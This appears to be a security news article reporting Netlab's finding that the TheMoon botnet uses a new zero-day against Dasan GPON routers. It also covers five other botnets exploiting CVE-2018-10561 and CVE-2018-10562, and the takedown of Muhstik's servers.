Attacks on Dasan GPON routers are continuing to happen using two vulnerabilities disclosed last month, but today, researchers from Qihoo 360 Netlab have revealed that one botnet operator appears to have deployed a new zero-day affecting the same router types.
The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.
"We tested this payload on two different versions of [Dasan] GPON home router," the Netlab team said, "all work."
The botnet exploiting this new GPON router zero-day is called TheMoon, a very old threat that was first spotted in 2014 infecting Linux servers but has started switching to home routers IoT in recent years.
TheMoon is only the latest botnet to add support for exploiting Dasan GPON routers. Five botnets —Hajime, Mettle, Mirai, Muhstik, and Satori— have been exploiting two older exploits for almost a week.
The two exploits these five botnets were targeting are CVE-2018-10561 and CVE-2018-10562.
These two vulnerabilities allow attackers to take over affected devices —GPON routers made by South Korean vendor Dasan. GPON stands for Gigabit Passive Optical Network and is a type of telecommunications technology for supporting internet connections via fiber optics lines.
Initially, it was believed the number of exposed devices was over one million, but the device maker later officially stated that the number of devices vulnerable to CVE-2018-10561 and CVE-2018-10562 was only 240,000.
The good news is that in spite of the large number of vulnerable devices, all five botnets trying to take advantage of these routers last week failed to do so. The reason was that the exploit packages they were trying to use failed to infect devices properly.
Netlab says that these five botnets managed to infect only around 2% of the entire pool of vulnerable GPON routers.
This might change in the upcoming days thanks to the new zero-day deployed by TheMoon botnet, but also because botnet operators have been working on improving their exploit payloads in the past days.
Nonetheless, Netlab says that together with the partners from the security industry they have scored a victory for the good guys, as they have managed to take down the servers of the Muhstik botnet, one of the five botnets that were targeting GPON routers last week.
However, the victory may be short-lived, as Muhstik admins appear to be attempting to install new servers and resume their router hacking activities.